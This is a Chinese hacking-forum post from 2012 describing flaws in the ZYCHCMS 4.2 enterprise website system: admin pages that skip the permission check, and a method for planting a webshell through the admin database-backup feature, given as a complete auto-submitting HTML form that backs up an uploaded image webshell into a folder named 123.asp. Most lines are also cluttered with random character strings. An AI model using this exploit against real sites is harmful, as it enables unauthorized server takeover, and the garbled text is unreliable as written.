找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1811|回复: 0
打印 上一主题 下一主题

ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:09:51 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

$ p$ \: H+ c) W- O% M7 o6 `; Z7 g! I# i6 l0 b
$ {: W. K1 [" a# {( l) p/ N
8 [) `0 Z3 c& O2 {9 j" J
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)5 k( h0 u0 T5 h2 p/ f6 @+ |' {2 w
①SQL注射漏洞
. D: B% S0 `/ |7 Q' E0 y. R 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
/ v8 f% ^9 |7 d. V 漏洞原因:未过滤
* |; y4 p1 Z) @9 n1 @; h 漏洞代码:. I) \) _* V& l( l0 W
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
$ `( t7 t9 J' s6 Z1 k! r 修复方法:在文件开头加入代码( U  ?" x) s8 ]( a% n0 b" @) [

% V/ S, {% d) M1 k6 \* X8 }
" q+ K$ a# P' ]& M②后台拿WBSHELL
1 A' D: k: v1 v4 D1 x; S/ O 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。) x4 X2 C) ~: E2 v- C
这里在网上找了一个,改了下,将就着用。
4 N  T' v: I9 F" ? 以下是代码本地提交代码
# j% Q, K( ^# @6 @
1 a& Y3 K- a, [1 D0 ?0 S
4 v- i1 {+ _- D! T<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
2 I: `. _& _, q2 s8 Y. d1 {0 y <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>2 |" x9 H$ h# ^$ F* e7 F6 i
<tr>1 o8 J/ K! d$ V
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>' f1 k; F- f2 N! j6 L/ l
</tr>6 K  h* @  k: p0 L8 @  m  P
<tr>
1 Q8 W1 W; Q( X) d <td bgcolor=”#FFFFFF”><span class=”back_southidc”>
! g' Z- c9 a! R </span>
2 b4 X$ A. j0 @$ K( l <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >$ \* C' R0 k0 A8 S" `
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >* Z* F9 ]+ X+ M9 ?; n
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>7 M4 E1 b" o# |: d
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
4 U5 C* ^0 L  Z  u% `- k; C <div align=”left”># Y- e0 j# g) n
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />7 ~7 H# ?9 D( o
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>9 }# _3 U' d7 Q% u
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />7 F' j1 @) O. x) Z6 w) W
</div></td>8 p2 j% M& \0 g
</tr>* W5 w7 o) }$ h" j' {
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>- ~7 @+ C7 v4 \
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
2 f: \- _6 d' Y7 |" N <td class=”td”><div align=”left”>
3 l! c% E; L! N+ p <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
+ ~) i* s5 E$ m! j [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>8 R1 @! T7 @- Q9 I/ p9 w: c7 n
</tr>
) y. P+ }: i8 b; n; C7 l" n <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>: X+ K* b) `% l9 q/ G. |
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
- N6 v) e  I0 { <td class=”td”><div align=”left”>
* e$ @% r9 }: o. c% r$ H+ ?, ` <input type=”submit” value=”确定备份” class=”btn”3 {4 r. R) m( F- |8 y/ c: }
</div></td>
1 w& G% ?8 E/ ]# x </tr>( U, u8 L& B  S8 i
</table></td></tr></form>2 H. f' R% b) t, \) Q4 q" Q" R
</table>
6 Y9 L% V& j- U+ c </td>  ^0 _* N& u6 v8 u& w4 X) P" g) Q
</tr>
+ U% L6 b8 f, u+ @/ _/ q </table>
/ X. `. i# G/ n5 A6 g+ ^ <script>
2 Y: a. U* L4 C" i6 k! ]( @2 s document.all.add.submit();% d+ s1 c" g) Y' G7 ^" b
</script>; T1 S5 U" V9 A4 b. a
( @% q% K- l0 J5 g/ J$ d

# Q1 B! R6 e2 C- _
& }* z* X7 r) l$ p* g
/ k, o- }3 }( x/ ^% h4 i+ F2 s9 d. J: |0 P# P# v) y

* N; t2 Q5 O  i9 ?+ w3 V! X
* h( H1 j# l- Q5 E: N/ ^+ t$ E4 X2 e$ a( _  y' u4 C$ [. J
5 y6 @/ v0 L. S9 {

2 ~, x9 }" P8 b) d
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表